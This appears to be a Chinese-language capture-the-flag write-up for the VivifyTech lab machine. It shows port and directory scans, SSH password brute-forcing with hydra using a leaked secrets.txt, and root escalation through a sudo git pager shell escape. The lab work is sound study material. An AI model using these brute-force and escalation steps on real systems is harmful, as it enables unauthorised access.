当前位置：首页 > news >正文

做网站一定需要虚拟主机吗兰州小的网络公司

news 2026/4/14 19:46:41

做网站一定需要虚拟主机吗,兰州小的网络公司,微信小程序公司网站怎么制作,国内贸易在那个网站上做渗透思路信息收集端口扫描端口服务信息目录扫描爆破hydra--sshgit提权信息收集 ┌──(kali㉿kali)-[~] └─$ fping -ag 192.168.9.0/24 2/dev/null 192.168.9.119 --主机 192.168.9.164 --靶机个人习惯#xff0c;也方便后续操作#xff0c;将IP地址赋值给一个变… 渗透思路信息收集端口扫描端口服务信息目录扫描爆破hydra--sshgit提权信息收集 ┌──(kali㉿kali)-[~] └─$ fping -ag 192.168.9.0/24 2/dev/null 192.168.9.119 --主机 192.168.9.164 --靶机个人习惯也方便后续操作将IP地址赋值给一个变量Iip ┌──(kali㉿kali)-[~] └─$ ip192.168.9.164 ┌──(kali㉿kali)-[~] └─$ echo $ip 192.168.9.164端口扫描 ┌──(kali㉿kali)-[~] └─$ sudo nmap -p- 192.168.9.164 --min-rate 10000 [sudo] kali 的密码 Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-29 05:27 EDT sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 192.168.9.163, 16) Operation not permitted Offending packet: TCP 192.168.9.119:38222 192.168.9.163:64573 S ttl58 id33393 iplen44 seq1503250300 win1024 mss 1460 Nmap scan report for 192.168.9.163 Host is up (0.085s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql 33060/tcp open mysqlx MAC Address: 08:00:27:EC:74:96 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 66.54 seconds开放3306:masql数据库的端口和33060:mysqlx不知道33060上网了解一下 MySQL X是一种用于MySQL数据库的新协议它支持文档存储和异步操作通常用于实现更高级的数据库功能端口服务信息 ┌──(kali㉿kali)-[~] └─$ sudo nmap -sT -sV -O -p- $ip Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-29 05:48 EDT Nmap scan report for 192.168.9.164 Host is up (0.010s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2deb12u1 (protocol 2.0) 80/tcp open http Apache httpd 2.4.57 ((Debian)) 3306/tcp open mysql MySQL (unauthorized) 33060/tcp open mysqlx? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port33060-TCP:V7.93%I7%D4/29%Time662F6CE5%Px86_64-pc-linux-gnu%r(N SF:ULL,9,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(GenericLines,9,\x05\0\0\0\x0b\ SF:x08\x05\x1a\0)%r(GetRequest,9,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(HTTPOp SF:tions,9,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(RTSPRequest,9,\x05\0\0\0\x0b SF:\x08\x05\x1a\0)%r(RPCCheck,9,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(DNSVers SF:ionBindReqTCP,9,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(DNSStatusRequestTCP,2 SF:B,\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88\x1a\x0fI SF:nvalid\x20message\\x05HY000)%r(Help,9,\x05\0\0\0\x0b\x08\x05\x1a\0) SF:%r(SSLSessionReq,2B,\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01 SF:\x10\x88\x1a\x0fInvalid\x20message\\x05HY000)%r(TerminalServerCookie SF:,9,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(TLSSessionReq,2B,\x05\0\0\0\x0b\x SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88\x1a\x0fInvalid\x20message\ SF:\x05HY000)%r(Kerberos,9,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(SMBProgNeg,9 SF:,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(X11Probe,2B,\x05\0\0\0\x0b\x08\x05\ SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88\x1a\x0fInvalid\x20message\\x05HY0 SF:00)%r(FourOhFourRequest,9,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(LPDString, SF:9,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(LDAPSearchReq,2B,\x05\0\0\0\x0b\x0 SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88\x1a\x0fInvalid\x20message\\ SF:x05HY000)%r(LDAPBindReq,46,\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x01\ SF:x08\x01\x10\x88\x1a\*Parse\x20error\x20unserializing\x20protobuf\x20me SF:ssage\\x05HY000)%r(SIPOptions,9,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(LAN SF:Desk-RC,9,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(TerminalServer,9,\x05\0\0\ SF:0\x0b\x08\x05\x1a\0)%r(NCP,9,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(NotesRP SF:C,2B,\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88\x1a\x SF:0fInvalid\x20message\\x05HY000)%r(JavaRMI,9,\x05\0\0\0\x0b\x08\x05\x SF:1a\0)%r(WMSRequest,9,\x05\0\0\0\x0b\x08\x05\x1a\0)%r(oracle-tns,32, SF:\x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88\x1a\x16Invalid SF:\x20message-frame\.\\x05HY000)%r(ms-sql-s,9,\x05\0\0\0\x0b\x08\x05\x SF:1a\0)%r(afp,2B,\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10 SF:\x88\x1a\x0fInvalid\x20message\\x05HY000); MAC Address: 08:00:27:EC:74:96 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.6 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.86 seconds80端口如图扫目录目录扫描 ┌──(kali㉿kali)-[~] └─$ sudo dirsearch -u http://192.168.9.164 -x 500,404_|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/kali/reports/http_192.168.9.164/_24-04-29_05-53-24.txtTarget: http://192.168.9.164/[05:53:24] Starting: [05:53:27] 403 - 278B - /.ht_wsr.txt [05:53:27] 403 - 278B - /.htaccess.orig [05:53:27] 403 - 278B - /.htaccess.bak1 [05:53:27] 403 - 278B - /.htaccess.save [05:53:27] 403 - 278B - /.htaccess.sample [05:53:27] 403 - 278B - /.htaccess_sc [05:53:27] 403 - 278B - /.htaccessOLD [05:53:27] 403 - 278B - /.htm [05:53:27] 403 - 278B - /.htaccess_orig [05:53:27] 403 - 278B - /.htaccessOLD2 [05:53:27] 403 - 278B - /.htaccess_extra [05:53:27] 403 - 278B - /.htaccessBAK [05:53:27] 403 - 278B - /.html [05:53:27] 403 - 278B - /.htpasswds [05:53:27] 403 - 278B - /.httr-oauth [05:53:28] 403 - 278B - /.htpasswd_test [05:53:29] 403 - 278B - /.php [05:54:28] 403 - 278B - /server-status [05:54:28] 403 - 278B - /server-status/ [05:54:49] 200 - 2KB - /wordpress/wp-login.php [05:54:50] 200 - 14KB - /wordpress/ Task Completed扫到一个wordpress目录还有登录页面一看就是wordpress的cms在扫描一下 ┌──(kali㉿kali)-[~] └─$ sudo dirsearch -u http://192.168.9.164/wordpress/ [sudo] kali 的密码_|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/kali/reports/http_192.168.9.164/_wordpress__24-04-29_06-17-53.txtTarget: http://192.168.9.164/ 。。。 [06:18:33] 301 - 0B - /wordpress/index.php - http://192.168.9.164/wordpress/ [06:18:34] 404 - 55KB - /wordpress/index.php/login/ [06:18:37] 200 - 7KB - /wordpress/license.txt [06:18:54] 200 - 3KB - /wordpress/readme.html [06:19:16] 301 - 327B - /wordpress/wp-admin - http://192.168.9.164/wordpress/wp-admin/ [06:19:16] 400 - 1B - /wordpress/wp-admin/admin-ajax.php [06:19:16] 409 - 3KB - /wordpress/wp-admin/setup-config.php [06:19:16] 200 - 0B - /wordpress/wp-config.php [06:19:16] 200 - 498B - /wordpress/wp-admin/install.php [06:19:16] 302 - 0B - /wordpress/wp-admin/ - http://192.168.9.164/wordpress/wp-login.php?redirect_tohttp%3A%2F%2F192.168.9.164%2Fwordpress%2Fwp-admin%2Freauth1 [06:19:16] 301 - 329B - /wordpress/wp-content - http://192.168.9.164/wordpress/wp-content/ [06:19:16] 200 - 0B - /wordpress/wp-content/ [06:19:16] 200 - 84B - /wordpress/wp-content/plugins/akismet/akismet.php [06:19:16] 500 - 0B - /wordpress/wp-content/plugins/hello.php [06:19:16] 200 - 422B - /wordpress/wp-content/upgrade/ [06:19:16] 200 - 483B - /wordpress/wp-content/uploads/ [06:19:17] 301 - 330B - /wordpress/wp-includes - http://192.168.9.164/wordpress/wp-includes/ [06:19:17] 200 - 5KB - /wordpress/wp-includes/ [06:19:17] 200 - 0B - /wordpress/wp-cron.php [06:19:17] 200 - 2KB - /wordpress/wp-login.php [06:19:17] 200 - 0B - /wordpress/wp-includes/rss-functions.php [06:19:17] 302 - 0B - /wordpress/wp-signup.php - http://192.168.9.164/wordpress/wp-login.php?actionregister [06:19:17] 405 - 42B - /wordpress/xmlrpc.php 发现很多的200一个一个的访问在 http://192.168.9.164/wordpress/wp-includes/中发现目录遍历在所有的.php文件中要么时空白页面被解析要么不能访问终于找到一个 http://192.168.9.164/wordpress/wp-includes/secrets.txt文本文件应该是用户名的密码但是user在哪不知道看了老外的文章找到了user用户。。。。英文不好一大冰每每遇到English就会自动跳过爆破hydra–ssh 先下载密码 ┌──(kali㉿kali)-[~] └─$ wget http://192.168.9.164/wordpress/wp-includes/secrets.txt --2024-04-29 06:46:52-- http://192.168.9.164/wordpress/wp-includes/secrets.txt 正在连接 192.168.9.164:80... 已连接。已发出 HTTP 请求正在等待回应... 200 OK 长度439 [text/plain] 正在保存至: “secrets.txt”secrets.txt 100%[] 439 --.-KB/s 用时 0s 2024-04-29 06:46:52 (14.1 MB/s) - 已保存 “secrets.txt” [439/439])创建用户列表 sarah mark emily jake alex┌──(kali㉿kali)-[~] └─$ sudo hydra -L user.txt -P secrets.txt $ip ssh Hydra v9.4 (c) 2022 by van Hauser/THC David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-29 06:53:36 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 240 login tries (l:5/p:48), ~15 tries per task [DATA] attacking ssh://192.168.9.164:22/ [22][ssh] host: 192.168.9.164 login: sarah password: bohicon 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-29 06:54:28得到账号密码sarah bohicon 成功登录 ┌──(kali㉿kali)-[~] └─$ ssh sarah$ip The authenticity of host 192.168.9.164 (192.168.9.164) cant be established. ED25519 key fingerprint is SHA256:i4eLII3uzJGiSMrTFLLAnrihC0r7/y6uuO7YMmGF7Rs. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 192.168.9.164 (ED25519) to the list of known hosts. sarah192.168.9.164s password: Linux VivifyTech 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64 ######################################## Welcome to VivifyTech ! ## The place to be :) # ####################################### Last login: Tue Dec 5 17:54:16 2023 from 192.168.177.129 sarahVivifyTech:~$ sudo -l [sudo] password for sarah: Sorry, user sarah may not run sudo on VivifyTech. sarahVivifyTech:~$ whoami sarah sarahVivifyTech:~$ ls -al total 32 drwx------ 4 sarah sarah 4096 Dec 5 17:53 . drwxr-xr-x 6 root root 4096 Dec 5 16:00 .. -rw------- 1 sarah sarah 0 Dec 5 17:53 .bash_history -rw-r--r-- 1 sarah sarah 245 Dec 5 17:33 .bash_logout -rw-r--r-- 1 sarah sarah 3565 Dec 5 17:48 .bashrc -rw------- 1 sarah sarah 0 Dec 5 17:49 .history drwxr-xr-x 3 sarah sarah 4096 Dec 5 16:19 .local drwxr-xr-x 2 sarah sarah 4096 Dec 5 16:19 .private -rw-r--r-- 1 sarah sarah 807 Dec 5 15:57 .profile -rw-r--r-- 1 sarah sarah 27 Dec 5 16:22 user.txt转到gbodja发现是git提权 git提权 sudo git -p help config !/bin/bashrootVivifyTech:/home/sarah/.private# id uid0(root) gid0(root) groups0(root) rootVivifyTech:/home/sarah/.private# cd /root rootVivifyTech:~# ls root.txt rootVivifyTech:~# cat root.txt HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}

查看全文

http://www.hkea.cn/news/14265118/